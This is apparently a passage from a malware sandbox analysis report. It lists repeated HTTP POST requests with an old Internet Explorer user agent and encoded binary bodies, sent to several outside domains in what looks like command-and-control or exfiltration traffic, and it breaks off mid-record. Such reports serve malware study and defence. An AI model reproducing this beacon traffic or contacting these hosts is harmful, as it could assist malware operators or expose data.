                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 2f 55 75 47 4c 63 32 53 6d 4a 64 30 76 39 6d 49 52 42 57 78 44 34 61 38 6f 72 63 37 41 73 73 43 55 64 44 41 7a 4f 6b 33 52 6e 67 53 35 72 36 44 35 73 45 6a 2b 53 46 6e 57 68 49 58 50 46 47 35 55 4a 6e 6a 63 42 75 6e 56 44 36 78 6e 39 6c 51 6d 77 67 46 61 78 34 49 34 59 2f 6c 48 74 56 79 7a 77 39 62 52 58 77 42 43 36 55 6e 4e 46 76 53 32 45 49 58 66 36 62 51 48 51 43 49 67 30 50 65 64 5a 41 43 51 6e 65 53 70 41 37 67 35 4d 77 45 58 73 56 39 4a 62 2f 44 63 54 43 54 44 33 64 52 50 43 78 35 35 36 6a 71 64 65 38 4f 41 52 77 69 74 61 61 2f 6e 4a 2f 70 47 37 52 45 44 39 59 39 56 59 58 44 46 46 50 63 33 48 56 64 58 63 38 55 78 63 6e 63 46 6b 2b 69 37 4c 77 4b 55 32 78 2b 42 57 2b 4e 6f 6b 4a 4e 79 43 6a 34 5a 64 7a 76 2b 73 35 34 68 47 69 63 53 2f 57 61 45 2f 50 68 57 49 73 76 6e 55 31 42 56 32 4d 33 30 76 58 70 51 66 67 44 77 32 44 46 4b 56 66 65 65 61 39 6c 75 53 4b 53 72 41 66 51 39 5a 48 44 77 71 5a 67 70 4a 43 4b 6c 67 66 69 6a 47 73 4c 65 58 6f 35 31 43 47 4a 57 4e 45 68 63 50 58 4f 75 72 55 41 55 54 6a 59 51 65 36 31 6b 67 38 42 33 39 50 51 39 2f 73 67 32 37 2b 6d 71 55 79 67 56 6f 4b 4c 63 52 35 4a 69 45 69 6d 71 76 6a 77 44 79 35 67 2f 36 4d 51 4e 45 4a 49 51 32 34 51 66 68 65 66 53 64 35 67 4d 78 48 67 57 55 5a 38 76 52 34 4e 31 74 33 73 69 67 36 7a 32 77 39 68 66 6d 77 54 54 7a 54 2b 4d 4c 36 32 4a 5a 78 79 55 69 72 33 66 2f 32 46 50 37 4c 62 37 31 52 46 43 35 33 47 35 5a 4d 51 50 4b 70 34 70 42 64 7a 38 30 2f 56 63 77 35 43 39 6e 56 61 70 41 46 72 65 30 2b 32 75 6d 37 69 44 53 69 45 56 73 4f 58 67 66 41 79 33 4a 5a 45 2b 76 4c 38 65 36 30 75 59 37 43 53 38 48 42 2f 78 7a 31 2b 6c 7a 6c 52 4b 4c 42 69 79 44 6b 6e 31 53 76 42 4c 7a 53 54 45 63 79 32 71 67 3d 3d Data Ascii: /UuGLc2SmJd0v9mIRBWxD4a8orc7AssCUdDAzOk3RngS5r6D5sEj+SFnWhIXPFG5UJnjcBunVD6xn9lQmwgFax4I4Y/lHtVyzw9bRXwBC6UnNFvS2EIXf6bQHQCIg0PedZACQneSpA7g5MwEXsV9Jb/DcTCTD3dRPCx556jqde8OARwitaa/nJ/pG7RED9Y9VYXDFFPc3HVdXc8UxcncFk+i7LwKU2x+BW+NokJNyCj4Zdzv+s54hGicS/WaE/PhWIsvnU1BV2M30vXpQfgDw2DFKVfeea9luSKSrAfQ9ZHDwqZgpJCKlgfijGsLeXo51CGJWNEhcPXOurUAUTjYQe61kg8B39PQ9/sg27+mqUygVoKLcR5JiEimqvjwDy5g/6MQNEJIQ24QfhefSd5gMxHgWUZ8vR4N1t3sig6z2w9hfmwTTzT+ML62JZxyUir3f/2FP7Lb71RFC53G5ZMQPKp4pBdz80/Vcw5C9nVapAFre0+2um7iDSiEVsOXgfAy3JZE+vL8e60uY7CS8HB/xz1+lzlRKLBiyDkn1SvBLzSTEcy2qg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 68 38 31 73 4e 44 57 4c 64 35 66 6b 45 4c 46 61 6e 43 4d 6c 4a 79 34 5a 32 6e 48 44 5a 75 36 53 4f 56 74 59 2f 66 6e 69 62 4c 36 35 53 2f 69 6f 69 77 50 66 41 6e 77 63 42 78 62 48 71 35 4b 6e 63 41 30 6d 6b 4e 77 2f 79 6f 57 70 65 6d 47 63 6c 4a 52 76 51 61 48 6d 64 6a 38 58 76 6e 53 63 50 34 55 38 36 53 35 6a 2b 4b 6b 4b 7a 78 4a 63 69 71 6a 44 53 49 58 54 43 75 4f 4e 65 74 49 58 4d 4b 6f 64 51 51 43 56 36 79 61 79 4b 63 63 45 59 6c 33 36 34 42 44 39 58 66 38 44 4b 42 6a 73 6c 32 63 6f 4e 76 35 73 5a 64 52 57 70 56 61 2b 6f 69 4c 59 54 76 44 50 35 4c 44 4e 70 34 50 70 37 4f 5a 63 71 2f 6d 51 58 4d 68 31 43 6f 39 6c 4e 35 2f 43 79 4e 67 73 57 32 77 79 4c 31 64 6c 32 4b 35 61 73 2f 36 7a 72 70 72 37 48 37 56 35 42 59 76 43 48 51 57 52 56 4a 39 31 46 33 61 73 66 4f 73 41 2f 65 71 4d 2f 66 72 53 52 2f 7a 6b 43 53 53 55 46 37 6f 6e 71 38 75 30 73 69 68 78 42 67 4c 2f 51 33 65 68 4b 6f 4e 4b 55 61 42 59 5a 38 6d 59 58 70 36 51 32 69 79 70 48 5a 75 59 4e 41 6b 34 36 2f 6e 4d 79 4b 32 51 4b 31 78 75 41 52 49 71 4c 6e 33 31 2f 7a 41 6e 45 63 66 39 65 79 74 42 69 36 4e 50 67 61 4e 38 48 57 61 75 33 4a 6f 72 68 4f 6c 37 71 4a 51 33 58 43 61 51 37 52 6a 50 33 63 4f 51 36 34 57 6d 62 5a 50 30 55 71 41 35 71 7a 32 78 6f 4e 6e 63 4c 4f 6b 4d 61 41 4a 2b 72 75 47 6c 53 6e 73 78 47 64 4e 47 63 4c 2f 32 50 6c 4d 75 39 7a 45 47 79 46 69 71 41 41 73 43 6c 33 39 36 65 33 44 32 2f 5a 34 55 46 38 69 70 47 68 2b 2b 53 35 34 6c 6b 56 62 75 50 51 33 69 58 7a 70 47 76 2b 2b 6f 2b 52 42 4a 32 63 54 78 52 69 4b 36 61 7a 69 70 51 6b 2b 6a 6f 76 31 56 50 76 7a 73 53 4a 65 57 4c 56 57 53 6f 6e 6f 44 78 79 51 58 43 4a 66 68 61 78 59 67 31 36 68 55 72 55 4c 63 46 76 5a 4a 45 46 50 32 48 67 3d 3d Data Ascii: h81sNDWLd5fkELFanCMlJy4Z2nHDZu6SOVtY/fnibL65S/ioiwPfAnwcBxbHq5KncA0mkNw/yoWpemGclJRvQaHmdj8XvnScP4U86S5j+KkKzxJciqjDSIXTCuONetIXMKodQQCV6yayKccEYl364BD9Xf8DKBjsl2coNv5sZdRWpVa+oiLYTvDP5LDNp4Pp7OZcq/mQXMh1Co9lN5/CyNgsW2wyL1dl2K5as/6zrpr7H7V5BYvCHQWRVJ91F3asfOsA/eqM/frSR/zkCSSUF7onq8u0sihxBgL/Q3ehKoNKUaBYZ8mYXp6Q2iypHZuYNAk46/nMyK2QK1xuARIqLn31/zAnEcf9eytBi6NPgaN8HWau3JorhOl7qJQ3XCaQ7RjP3cOQ64WmbZP0UqA5qz2xoNncLOkMaAJ+ruGlSnsxGdNGcL/2PlMu9zEGyFiqAAsCl396e3D2/Z4UF8ipGh++S54lkVbuPQ3iXzpGv++o+RBJ2cTxRiK6azipQk+jov1VPvzsSJeWLVWSonoDxyQXCJfhaxYg16hUrULcFvZJEFP2Hg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 41 49 6c 72 75 37 77 39 68 4a 66 32 48 39 46 76 5a 2f 30 61 70 6b 39 34 37 44 68 55 56 63 70 4b 73 45 70 77 6d 71 56 7a 66 30 61 33 5a 4f 4e 32 74 33 35 63 43 31 33 77 6f 4f 48 5a 53 2b 4c 5a 70 74 6a 37 49 38 6f 44 51 37 54 4d 30 4f 46 4e 41 73 41 50 74 45 4b 55 56 6e 45 4d 39 4d 2f 35 78 4b 68 55 43 51 44 67 41 39 6a 66 79 66 2b 4b 45 6f 59 70 47 70 2b 32 48 78 50 33 48 6f 37 68 41 72 55 4a 2f 36 76 75 6a 4e 4b 48 54 36 54 4f 31 70 34 53 6b 66 44 37 58 44 69 36 4d 36 45 61 55 78 34 43 66 52 6e 51 6d 6f 32 6a 68 71 46 74 52 78 6b 50 5a 4a 64 75 72 76 6e 6f 42 79 46 74 58 39 34 42 58 51 6b 6f 33 4d 61 67 36 79 53 30 6c 66 78 50 4b 70 71 51 63 63 72 34 59 50 58 37 5a 52 66 72 36 30 4a 64 55 6e 6e 57 55 4c 41 6f 41 4e 66 4e 73 66 58 56 43 47 62 30 47 39 38 62 38 51 61 45 57 46 79 6e 2b 4d 65 57 6d 58 4d 63 51 53 57 58 42 74 4b 4e 6b 51 6f 6d 45 71 4b 47 61 62 76 30 4c 7a 2f 49 59 77 2f 44 4a 6d 43 6a 7a 75 36 43 6b 68 65 57 41 6d 6e 2b 30 47 58 58 48 6c 49 75 4d 46 5a 6c 66 4f 53 4d 6d 42 4a 76 54 65 38 2b 63 6d 39 62 79 41 7a 35 59 43 64 31 2f 33 59 51 53 50 48 54 45 6b 57 6e 4d 43 6f 77 34 46 75 33 53 38 74 6f 54 78 43 35 6d 31 64 30 73 55 48 6f 43 6c 69 4c 72 33 55 72 5a 48 35 6a 4c 57 4d 32 71 73 4e 51 6e 74 51 79 6d 43 78 78 57 47 75 59 2b 4c 49 76 6d 41 70 6d 75 59 54 44 78 4c 31 77 6b 77 33 57 74 44 61 73 4d 41 74 64 37 79 4e 4c 45 66 48 77 42 2b 6d 2b 4f 2f 76 2b 47 78 7a 6d 7a 70 35 6c 45 32 79 41 6e 54 39 48 7a 55 58 36 70 4d 30 32 31 46 38 71 68 62 51 46 43 48 37 75 41 71 73 78 57 38 72 66 44 56 43 51 53 72 36 4b 69 4d 52 2f 62 39 78 4b 50 49 71 65 37 33 68 4f 6e 35 70 66 39 42 57 41 4f 61 71 49 61 41 51 36 54 7a 33 39 2b 4b 4a 70 4f 54 30 71 38 32 2f 4a 2f 48 61 51 35 54 36 49 4e 2f 46 78 69 4d 46 38 68 55 35 5a 6c 6f 41 3d Data Ascii: AIlru7w9hJf2H9FvZ/0apk947DhUVcpKsEpwmqVzf0a3ZON2t35cC13woOHZS+LZptj7I8oDQ7TM0OFNAsAPtEKUVnEM9M/5xKhUCQDgA9jfyf+KEoYpGp+2HxP3Ho7hArUJ/6vujNKHT6TO1p4SkfD7XDi6M6EaUx4CfRnQmo2jhqFtRxkPZJdurvnoByFtX94BXQko3Mag6yS0lfxPKpqQccr4YPX7ZRfr60JdUnnWULAoANfNsfXVCGb0G98b8QaEWFyn+MeWmXMcQSWXBtKNkQomEqKGabv0Lz/IYw/DJmCjzu6CkheWAmn+0GXXHlIuMFZlfOSMmBJvTe8+cm9byAz5YCd1/3YQSPHTEkWnMCow4Fu3S8toTxC5m1d0sUHoCliLr3UrZH5jLWM2qsNQntQymCxxWGuY+LIvmApmuYTDxL1wkw3WtDasMAtd7yNLEfHwB+m+O/v+Gxzmzp5lE2yAnT9HzUX6pM021F8qhbQFCH7uAqsxW8rfDVCQSr6KiMR/b9xKPIqe73hOn5pf9BWAOaqIaAQ6Tz39+KJpOT0q82/J/HaQ5T6IN/FxiMF8hU5ZloA=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 50 61 33 64 2f 45 7a 2b 6c 70 64 6d 72 6d 2f 32 74 79 58 59 37 56 39 62 41 52 49 6b 6d 55 6c 71 51 46 54 68 70 50 54 2b 46 57 41 7a 32 4d 69 67 4b 42 67 53 4f 6d 42 30 54 68 76 2b 59 56 33 4a 6b 42 67 54 41 71 39 4a 59 34 69 78 63 59 4e 69 2f 53 43 6f 6e 44 45 64 37 5a 39 33 54 4f 31 74 56 51 2f 69 76 43 35 45 4a 31 72 4d 74 61 5a 4d 43 2b 52 6e 43 54 70 74 78 58 51 34 54 63 57 45 4b 4b 6b 35 53 44 66 62 74 7a 2f 5a 48 73 53 64 50 4d 68 36 2b 4e 67 31 58 6e 64 74 70 68 47 49 49 6f 33 46 4d 6b 67 5a 6e 63 38 4f 45 45 44 4a 6d 4f 59 38 44 4f 78 4b 4a 58 62 71 4b 54 50 38 39 73 78 63 54 55 71 67 36 2f 5a 49 33 51 54 32 2f 39 41 31 6b 6f 61 70 30 6a 4f 36 55 47 58 70 6d 36 48 48 46 58 64 44 46 74 34 72 61 75 77 39 74 30 74 58 57 57 34 42 77 2b 48 76 45 39 61 57 45 76 51 35 6e 39 79 45 48 59 5a 51 53 77 42 64 36 6b 30 78 34 62 52 4e 6a 55 55 6b 6a 78 37 4f 53 41 6f 4f 59 79 2f 32 57 76 64 72 38 6b 6c 64 46 4e 38 6e 66 76 56 46 47 78 66 2b 57 38 36 59 74 32 47 4f 72 57 50 70 78 52 5a 78 56 4d 2b 31 42 70 39 69 42 4b 4d 6e 4a 32 37 72 33 46 6c 2b 79 37 46 41 53 57 65 67 31 6f 52 39 34 48 67 4f 4e 52 46 5a 66 37 6d 4e 65 48 78 57 56 74 51 62 41 72 6d 31 76 59 72 67 46 5a 76 57 76 6f 61 38 57 39 61 36 5a 51 5a 4d 4d 78 31 59 62 43 48 50 7a 44 49 48 69 52 4f 75 43 74 45 59 52 56 78 71 57 68 70 33 64 42 50 68 2f 4e 67 65 77 78 79 63 44 48 75 33 6d 41 6a 31 47 53 5a 34 51 6d 72 67 52 52 35 73 2f 34 79 72 61 31 2f 77 54 75 6c 63 64 35 4b 45 6a 38 6f 56 38 47 42 51 57 78 58 68 56 52 63 57 38 55 4f 73 6d 7a 66 43 6c 30 59 75 34 2f 71 30 41 6e 46 78 4e 58 6d 30 44 68 53 41 4c 75 4f 6e 76 69 76 4b 44 4b 53 62 65 63 2f 64 79 62 36 6c 5a 58 6f 65 47 35 4c 6b 39 32 63 3d Data Ascii: Pa3d/Ez+lpdmrm/2tyXY7V9bARIkmUlqQFThpPT+FWAz2MigKBgSOmB0Thv+YV3JkBgTAq9JY4ixcYNi/SConDEd7Z93TO1tVQ/ivC5EJ1rMtaZMC+RnCTptxXQ4TcWEKKk5SDfbtz/ZHsSdPMh6+Ng1XndtphGIIo3FMkgZnc8OEEDJmOY8DOxKJXbqKTP89sxcTUqg6/ZI3QT2/9A1koap0jO6UGXpm6HHFXdDFt4rauw9t0tXWW4Bw+HvE9aWEvQ5n9yEHYZQSwBd6k0x4bRNjUUkjx7OSAoOYy/2Wvdr8kldFN8nfvVFGxf+W86Yt2GOrWPpxRZxVM+1Bp9iBKMnJ27r3Fl+y7FASWeg1oR94HgONRFZf7mNeHxWVtQbArm1vYrgFZvWvoa8W9a6ZQZMMx1YbCHPzDIHiROuCtEYRVxqWhp3dBPh/NgewxycDHu3mAj1GSZ4QmrgRR5s/4yra1/wTulcd5KEj8oV8GBQWxXhVRcW8UOsmzfCl0Yu4/q0AnFxNXm0DhSALuOnvivKDKSbec/dyb6lZXoeG5Lk92c=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6c 2f 4e 43 30 6f 6c 39 78 35 66 59 55 6e 62 6f 32 4f 6e 31 72 36 4a 47 46 2f 43 6e 43 65 46 6d 7a 61 6a 2f 79 35 42 53 4c 7a 59 52 56 43 47 34 53 48 69 76 58 58 36 77 50 4a 78 63 44 73 54 7a 73 46 51 4d 67 34 78 58 33 43 61 5a 7a 39 32 4b 4b 68 2f 68 73 44 6e 72 57 4d 6d 36 59 33 65 54 36 4d 49 6d 31 4a 4c 6e 4a 36 4b 4a 4b 6e 7a 55 54 31 64 61 6a 46 31 4a 75 39 52 37 38 54 43 4b 2b 59 37 6d 46 5a 72 2b 58 6a 73 68 76 62 5a 45 62 6d 46 41 63 6a 44 6a 44 6e 66 32 72 2f 7a 34 55 35 48 34 4e 2f 77 6e 32 47 68 32 36 58 6d 70 6f 74 46 70 4c 36 63 58 2b 7a 76 62 4c 32 59 48 73 71 44 58 66 66 77 4d 63 4f 63 2b 64 6a 77 69 51 59 57 41 42 51 44 6f 78 72 41 44 72 62 65 56 53 64 55 70 55 4f 68 70 49 42 4d 75 43 75 30 51 4a 74 67 64 52 4e 62 57 35 36 77 68 6d 67 4e 4d 47 39 69 2f 57 56 61 30 71 75 30 72 56 4a 56 67 76 67 72 4c 46 4b 39 4c 70 54 74 68 74 65 62 48 42 6d 66 4b 4b 65 4e 65 78 47 33 39 73 61 42 67 64 74 5a 65 7a 75 47 43 42 76 63 6f 32 62 36 68 71 2b 70 4d 4c 45 4a 5a 70 30 6b 74 4c 72 66 51 6d 46 4c 70 6a 6d 36 6c 65 48 4c 69 75 78 6f 2f 33 56 69 46 54 62 33 59 50 49 49 56 63 4f 36 67 6a 71 33 4a 7a 6b 34 62 72 61 77 65 77 2f 2f 49 57 50 79 67 79 32 4a 6f 77 73 79 78 39 2b 57 4c 65 73 73 54 43 55 72 71 67 30 2f 65 6d 6d 57 4d 79 50 58 2f 4c 71 56 4b 4e 44 52 6b 6d 74 58 58 59 75 35 61 75 4d 74 66 4d 71 39 4f 35 71 67 4e 48 4b 75 76 4d 72 4a 69 34 4a 70 43 6f 75 58 73 37 58 38 5a 33 73 51 68 50 51 53 31 54 30 4e 56 68 59 4b 62 31 77 59 71 4c 62 54 5a 6b 31 39 73 48 48 39 69 2b 4c 76 5a 36 56 76 74 63 4e 62 72 4a 4c 4c 34 31 66 59 6e 6e 66 62 51 69 75 4a 4e 34 31 46 64 39 43 62 76 51 68 33 74 70 74 6a 30 64 49 42 71 2b 77 3d 3d Data Ascii: l/NC0ol9x5fYUnbo2On1r6JGF/CnCeFmzaj/y5BSLzYRVCG4SHivXX6wPJxcDsTzsFQMg4xX3CaZz92KKh/hsDnrWMm6Y3eT6MIm1JLnJ6KJKnzUT1dajF1Ju9R78TCK+Y7mFZr+XjshvbZEbmFAcjDjDnf2r/z4U5H4N/wn2Gh26XmpotFpL6cX+zvbL2YHsqDXffwMcOc+djwiQYWABQDoxrADrbeVSdUpUOhpIBMuCu0QJtgdRNbW56whmgNMG9i/WVa0qu0rVJVgvgrLFK9LpTthtebHBmfKKeNexG39saBgdtZezuGCBvco2b6hq+pMLEJZp0ktLrfQmFLpjm6leHLiuxo/3ViFTb3YPIIVcO6gjq3Jzk4brawew//IWPygy2Jowsyx9+WLessTCUrqg0/emmWMyPX/LqVKNDRkmtXXYu5auMtfMq9O5qgNHKuvMrJi4JpCouXs7X8Z3sQhPQS1T0NVhYKb1wYqLbTZk19sHH9i+LvZ6VvtcNbrJLL41fYnnfbQiuJN41Fd9CbvQh3tptj0dIBq+w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 56 2b 2f 39 79 63 6b 34 78 35 63 77 41 44 6e 74 47 4f 76 4e 33 65 4c 6a 4e 49 33 6e 74 55 6d 4a 44 58 67 4f 54 31 56 32 41 38 51 59 53 47 56 59 4b 32 55 54 67 66 66 79 31 67 4f 45 62 78 4e 49 6e 6b 53 78 66 34 56 65 76 5a 58 4e 4e 79 68 59 65 36 7a 51 64 4d 42 7a 2f 36 38 39 2f 43 73 6c 5a 54 4a 68 4f 65 57 50 6e 41 39 50 4f 2f 68 63 59 44 2b 73 4c 77 68 64 2b 55 70 6f 52 6b 4a 38 7a 6e 7a 7a 55 33 7a 58 77 31 52 32 52 7a 55 63 77 77 6d 2b 71 68 69 4b 54 6a 75 69 59 6c 39 52 6f 64 6d 32 56 39 33 32 5a 35 5a 50 4c 6e 73 79 38 53 50 52 48 69 47 54 33 78 41 48 31 79 67 71 7a 64 61 54 38 64 73 30 47 41 67 44 38 77 6a 64 2f 57 51 50 65 32 78 75 75 74 41 73 32 61 49 32 50 52 52 77 68 34 74 38 4b 57 58 38 4f 66 6b 74 6f 64 6b 37 5a 51 68 6d 48 71 32 4c 51 78 2b 68 41 37 77 44 50 49 73 6d 35 73 73 2b 2b 67 6e 32 78 6c 43 6d 64 39 77 79 34 46 67 6d 75 45 38 6b 75 57 57 5a 69 4b 6d 58 33 4b 6a 4b 4c 65 5a 39 53 5a 37 52 72 5a 4b 58 47 31 4d 7a 56 68 70 51 51 44 35 75 55 76 49 38 77 5a 7a 66 63 73 31 6f 77 4f 37 6a 6e 64 50 69 54 75 36 42 6c 30 2f 68 36 74 52 51 2f 5a 63 2f 54 71 4b 78 68 6b 4c 4d 4e 35 75 30 75 59 65 70 4a 45 78 38 64 5a 48 45 49 2b 37 50 73 7a 76 55 70 32 65 57 75 4c 57 51 46 71 37 78 57 79 32 57 67 35 55 33 2b 41 71 31 68 69 4a 53 71 45 72 73 2f 49 76 2b 59 7a 50 46 68 70 49 39 77 54 68 2b 35 6f 45 39 2f 2b 6e 68 47 6e 30 56 69 73 4e 35 4a 70 4d 64 51 72 31 38 48 79 4d 47 57 45 4d 65 62 59 35 44 6e 53 62 5a 6a 48 39 2b 66 50 6a 64 44 69 70 7a 67 56 42 35 30 72 5a 72 6e 45 72 4c 6f 38 77 7a 48 68 6c 4c 6c 7a 65 45 36 51 79 54 49 65 67 4a 51 2b 2f 4c 37 41 79 49 4e 67 54 64 6d 6e 32 4c 48 4c 69 79 68 57 33 6d 69 75 6d 31 47 58 35 73 58 59 32 71 55 66 4f 64 45 79 53 30 4d 47 44 37 58 48 5a 47 72 42 63 75 73 58 59 3d Data Ascii: V+/9yck4x5cwADntGOvN3eLjNI3ntUmJDXgOT1V2A8QYSGVYK2UTgffy1gOEbxNInkSxf4VevZXNNyhYe6zQdMBz/689/CslZTJhOeWPnA9PO/hcYD+sLwhd+UpoRkJ8znzzU3zXw1R2RzUcwwm+qhiKTjuiYl9Rodm2V932Z5ZPLnsy8SPRHiGT3xAH1ygqzdaT8ds0GAgD8wjd/WQPe2xuutAs2aI2PRRwh4t8KWX8Ofktodk7ZQhmHq2LQx+hA7wDPIsm5ss++gn2xlCmd9wy4FgmuE8kuWWZiKmX3KjKLeZ9SZ7RrZKXG1MzVhpQQD5uUvI8wZzfcs1owO7jndPiTu6Bl0/h6tRQ/Zc/TqKxhkLMN5u0uYepJEx8dZHEI+7PszvUp2eWuLWQFq7xWy2Wg5U3+Aq1hiJSqErs/Iv+YzPFhpI9wTh+5oE9/+nhGn0VisN5JpMdQr18HyMGWEMebY5DnSbZjH9+fPjdDipzgVB50rZrnErLo8wzHhlLlzeE6QyTIegJQ+/L7AyINgTdmn2LHLiyhW3mium1GX5sXY2qUfOdEyS0MGD7XHZGrBcusXY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 50 61 33 64 2f 45 7a 2b 6c 70 64 6d 72 6d 2f 32 74 79 58 59 37 56 39 62 41 52 49 6b 6d 55 6c 71 51 46 54 68 70 50 54 2b 46 57 41 7a 32 4d 69 67 4b 42 67 53 4f 6d 42 30 54 68 76 2b 59 56 33 4a 6b 42 67 54 41 71 39 4a 59 34 69 78 63 59 4e 69 2f 53 43 6f 6e 44 45 64 37 5a 39 33 54 4f 31 74 56 51 2f 69 76 43 35 45 4a 31 72 4d 74 61 5a 4d 43 2b 52 6e 43 54 70 74 78 58 51 34 54 63 57 45 4b 4b 6b 35 53 44 66 62 74 7a 2f 5a 48 73 53 64 50 4d 68 36 2b 4e 67 31 58 6e 64 74 70 68 47 49 49 6f 33 46 4d 6b 67 5a 6e 63 38 4f 45 45 44 4a 6d 4f 59 38 44 4f 78 4b 4a 58 62 71 4b 54 50 38 39 73 78 63 54 55 71 67 36 2f 5a 49 33 51 54 32 2f 39 41 31 6b 6f 61 70 30 6a 4f 36 55 47 58 70 6d 36 48 48 46 58 64 44 46 74 34 72 61 75 77 39 74 30 74 58 57 57 34 42 77 2b 48 76 45 39 61 57 45 76 51 35 6e 39 79 45 48 59 5a 51 53 77 42 64 36 6b 30 78 34 62 52 4e 6a 55 55 6b 6a 78 37 4f 53 41 6f 4f 59 79 2f 32 57 76 64 72 38 6b 6c 64 46 4e 38 6e 66 76 56 46 47 78 66 2b 57 38 36 59 74 32 47 4f 72 57 50 70 78 52 5a 78 56 4d 2b 31 42 70 39 69 42 4b 4d 6e 4a 32 37 72 33 46 6c 2b 79 37 46 41 53 57 65 67 31 6f 52 39 34 48 67 4f 4e 52 46 5a 66 37 6d 4e 65 48 78 57 56 74 51 62 41 72 6d 31 76 59 72 67 46 5a 76 57 76 6f 61 38 57 39 61 36 5a 51 5a 4d 4d 78 31 59 62 43 48 50 7a 44 49 48 69 52 4f 75 43 74 45 59 52 56 78 71 57 68 70 33 64 42 50 68 2f 4e 67 65 77 78 79 63 44 48 75 33 6d 41 6a 31 47 53 5a 34 51 6d 72 67 52 52 35 73 2f 34 79 72 61 31 2f 77 54 75 6c 63 64 35 4b 45 6a 38 6f 56 38 47 42 51 57 78 58 68 56 52 63 57 38 55 4f 73 6d 7a 66 43 6c 30 59 75 34 2f 71 30 41 6e 46 78 4e 58 6d 30 44 68 53 41 4c 75 4f 6e 76 69 76 4b 44 4b 53 62 65 63 2f 64 79 62 36 6c 5a 58 6f 65 47 35 4c 6b 39 32 63 3d Data Ascii: Pa3d/Ez+lpdmrm/2tyXY7V9bARIkmUlqQFThpPT+FWAz2MigKBgSOmB0Thv+YV3JkBgTAq9JY4ixcYNi/SConDEd7Z93TO1tVQ/ivC5EJ1rMtaZMC+RnCTptxXQ4TcWEKKk5SDfbtz/ZHsSdPMh6+Ng1XndtphGIIo3FMkgZnc8OEEDJmOY8DOxKJXbqKTP89sxcTUqg6/ZI3QT2/9A1koap0jO6UGXpm6HHFXdDFt4rauw9t0tXWW4Bw+HvE9aWEvQ5n9yEHYZQSwBd6k0x4bRNjUUkjx7OSAoOYy/2Wvdr8kldFN8nfvVFGxf+W86Yt2GOrWPpxRZxVM+1Bp9iBKMnJ27r3Fl+y7FASWeg1oR94HgONRFZf7mNeHxWVtQbArm1vYrgFZvWvoa8W9a6ZQZMMx1YbCHPzDIHiROuCtEYRVxqWhp3dBPh/NgewxycDHu3mAj1GSZ4QmrgRR5s/4yra1/wTulcd5KEj8oV8GBQWxXhVRcW8UOsmzfCl0Yu4/q0AnFxNXm0DhSALuOnvivKDKSbec/dyb6lZXoeG5Lk92c=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6c 2f 4e 43 30 6f 6c 39 78 35 66 59 55 6e 62 6f 32 4f 6e 31 72 36 4a 47 46 2f 43 6e 43 65 46 6d 7a 61 6a 2f 79 35 42 53 4c 7a 59 52 56 43 47 34 53 48 69 76 58 58 36 77 50 4a 78 63 44 73 54 7a 73 46 51 4d 67 34 78 58 33 43 61 5a 7a 39 32 4b 4b 68 2f 68 73 44 6e 72 57 4d 6d 36 59 33 65 54 36 4d 49 6d 31 4a 4c 6e 4a 36 4b 4a 4b 6e 7a 55 54 31 64 61 6a 46 31 4a 75 39 52 37 38 54 43 4b 2b 59 37 6d 46 5a 72 2b 58 6a 73 68 76 62 5a 45 62 6d 46 41 63 6a 44 6a 44 6e 66 32 72 2f 7a 34 55 35 48 34 4e 2f 77 6e 32 47 68 32 36 58 6d 70 6f 74 46 70 4c 36 63 58 2b 7a 76 62 4c 32 59 48 73 71 44 58 66 66 77 4d 63 4f 63 2b 64 6a 77 69 51 59 57 41 42 51 44 6f 78 72 41 44 72 62 65 56 53 64 55 70 55 4f 68 70 49 42 4d 75 43 75 30 51 4a 74 67 64 52 4e 62 57 35 36 77 68 6d 67 4e 4d 47 39 69 2f 57 56 61 30 71 75 30 72 56 4a 56 67 76 67 72 4c 46 4b 39 4c 70 54 74 68 74 65 62 48 42 6d 66 4b 4b 65 4e 65 78 47 33 39 73 61 42 67 64 74 5a 65 7a 75 47 43 42 76 63 6f 32 62 36 68 71 2b 70 4d 4c 45 4a 5a 70 30 6b 74 4c 72 66 51 6d 46 4c 70 6a 6d 36 6c 65 48 4c 69 75 78 6f 2f 33 56 69 46 54 62 33 59 50 49 49 56 63 4f 36 67 6a 71 33 4a 7a 6b 34 62 72 61 77 65 77 2f 2f 49 57 50 79 67 79 32 4a 6f 77 73 79 78 39 2b 57 4c 65 73 73 54 43 55 72 71 67 30 2f 65 6d 6d 57 4d 79 50 58 2f 4c 71 56 4b 4e 44 52 6b 6d 74 58 58 59 75 35 61 75 4d 74 66 4d 71 39 4f 35 71 67 4e 48 4b 